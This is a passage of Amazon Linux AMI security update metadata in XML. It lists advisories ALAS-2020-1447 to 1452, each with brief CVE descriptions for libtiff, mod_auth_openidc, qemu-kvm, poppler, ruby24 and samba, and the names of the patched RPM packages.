release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.203-116.332.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1447</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1447: medium priority package update for libtiff</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-17546:
tif_getimage.c in LibTIFF through 4.0.10, as used in GDAL through 3.0.1 and other products, has an integer overflow that potentially causes a heap-based buffer overflow via a crafted RGBA image, related to a "Negative-size-param" condition.
1765705: CVE-2019-17546 libtiff: integer overflow leading to heap-based buffer overflow in tif_getimage.c
CVE-2019-14973:
_TIFFCheckMalloc and _TIFFCheckRealloc in tif_aux.c in LibTIFF through 4.0.10 mishandle Integer Overflow checks because they rely on compiler behavior that is undefined by the applicable C standards. This can, for example, lead to an application crash.
1745951: CVE-2019-14973 libtiff: integer overflow in _TIFFCheckMalloc and _TIFFCheckRealloc in tif_aux.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14973" title="" id="CVE-2019-14973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17546" title="" id="CVE-2019-17546" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.36.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.36.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.36.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1448</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1448: medium priority package update for mod24_auth_openidc</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20479:
An open redirect flaw was discovered in mod_auth_openidc where it handles logout redirection. The module does not correctly validate the URL, allowing a URL with slash and backslash at the beginning to bypass the protection checks. A victim user may be tricked into visiting a trusted vulnerable web site, which would redirect him to another, possibly malicious, URL.
1805102: CVE-2019-20479 mod_auth_openidc: Open redirect issue exists in URLs with slash and backslash
CVE-2019-14857:
An open redirect flaw was discovered in mod_auth_openidc, where it handles logout redirection. The module does not correctly validate the URL, allowing a URL with leading slashes to bypass the protection checks. A victim user may be tricked into visiting a trusted vulnerable web site, which would redirect them to another possibly malicious URL.
1760613: CVE-2019-14857 mod_auth_openidc: Open redirect in logout url when using URLs with leading slashes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14857" title="" id="CVE-2019-14857" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20479" title="" id="CVE-2019-20479" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_openidc" version="1.8.8" release="7.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-1.8.8-7.6.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="7.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-7.6.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="7.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-7.6.amzn1.i686.rpm</filename></package><package name="mod24_auth_openidc" version="1.8.8" release="7.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-1.8.8-7.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1449</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1449: important priority package update for qemu-kvm</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1983:
A use-after-free flaw was found in the SLiRP networking implementation of the QEMU emulator. Specifically, this flaw occurs in the ip_reass() routine while reassembling incoming IP fragments whose combined size is bigger than 65k. This flaw allows an attacker to crash the QEMU process on the host, resulting in a denial of service.
A use after free vulnerability in ip_reass() in ip_input.c of libslirp 4.2.0 and prior releases allows crafted packets to cause a denial of service.
1829825: CVE-2020-1983 QEMU: slirp: use-after-free in ip_reass() function in ip_input.c
CVE-2020-14364:
An out-of-bounds read/write access flaw was found in the USB emulator of the QEMU. This issue occurs while processing USB packets from a guest when USBDevice 'setup_len' exceeds its 'data_buf[4096]' in the do_token_in, do_token_out routines. This flaw allows a guest user to crash the QEMU process, resulting in a denial of service, or the potential execution of arbitrary code with the privileges of the QEMU process on the host.
1869201: CVE-2020-14364 QEMU: usb: out-of-bounds r/w access issue while processing usb packets
CVE-2019-14378:
ip_reass in ip_input.c in libslirp 4.0.0 has a heap-based buffer overflow via a large packet because it mishandles a case involving the first fragment.
A heap buffer overflow issue was found in the SLiRP networking implementation of the QEMU emulator. This flaw occurs in the ip_reass() routine while reassembling incoming packets if the first fragment is bigger than the m->m_dat[] buffer. An attacker could use this flaw to crash the QEMU process on the host, resulting in a Denial of Service or potentially executing arbitrary code with privileges of the QEMU process.
1734745: CVE-2019-14378 QEMU: slirp: heap buffer overflow during packet reassembly
CVE-2018-15746:
qemu-seccomp.c in QEMU might allow local OS guest users to cause a denial of service (guest crash) by leveraging mishandling of the seccomp policy for threads other than the main thread.
1615637: CVE-2018-15746 QEMU: seccomp: blacklist is not applied to all threads
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15746" title="" id="CVE-2018-15746" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14378" title="" id="CVE-2019-14378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14364" title="" id="CVE-2020-14364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1983" title="" id="CVE-2020-1983" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.24.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1450</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1450: low priority package update for poppler</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14494:
A divide-by-zero error was found in the way Poppler handled certain PDF files. A remote attacker could exploit this flaw by providing a malicious PDF file that, when processed by an application linked to Poppler, would crash the application causing a denial of service.
1797453: CVE-2019-14494 poppler: divide-by-zero in function SplashOutputDev::tilingPatternFill in SplashOutputDev.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14494" title="" id="CVE-2019-14494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1451</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1451: medium priority package update for ruby24</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25613:
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.
1883623: CVE-2020-25613 ruby: potential HTTP request smuggling in WEBrick
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25613" title="" id="CVE-2020-25613" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby24-devel" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.13.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.4" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.13.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.4" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.13.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" version="2.4.10" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.13.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.13.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.13.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.13.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.13.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1452</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1452: medium priority package update for samba</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14907:
All samba versions 4.9.x before 4.9.18, 4.10.x before 4.10.12 and 4.11.x before 4.11.5 have an issue where if it is set with "log level = 3" (or above) then the string obtained from the client, after a failed character conversion, is printed. Such strings can be provided during the NTLMSSP authentication exchange. In the Samba AD DC in particular, this may cause a long-lived process(such as the RPC server) to terminate. (In the file server case, the most likely target, smbd, operates as process-per-client and so a crash there is harmless).
1791207: CVE-2019-14907 samba: Crash after failed character conversion at log level 3 or above
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14907" title="" id="CVE-2019-14907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-krb5-printing" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="5.54.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-5.54.amzn1.noarch.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="5.54.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-5.54.amzn1.noarch.rpm</filename></package><package name="ctdb" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="5.54.amzn1" epoch="0" 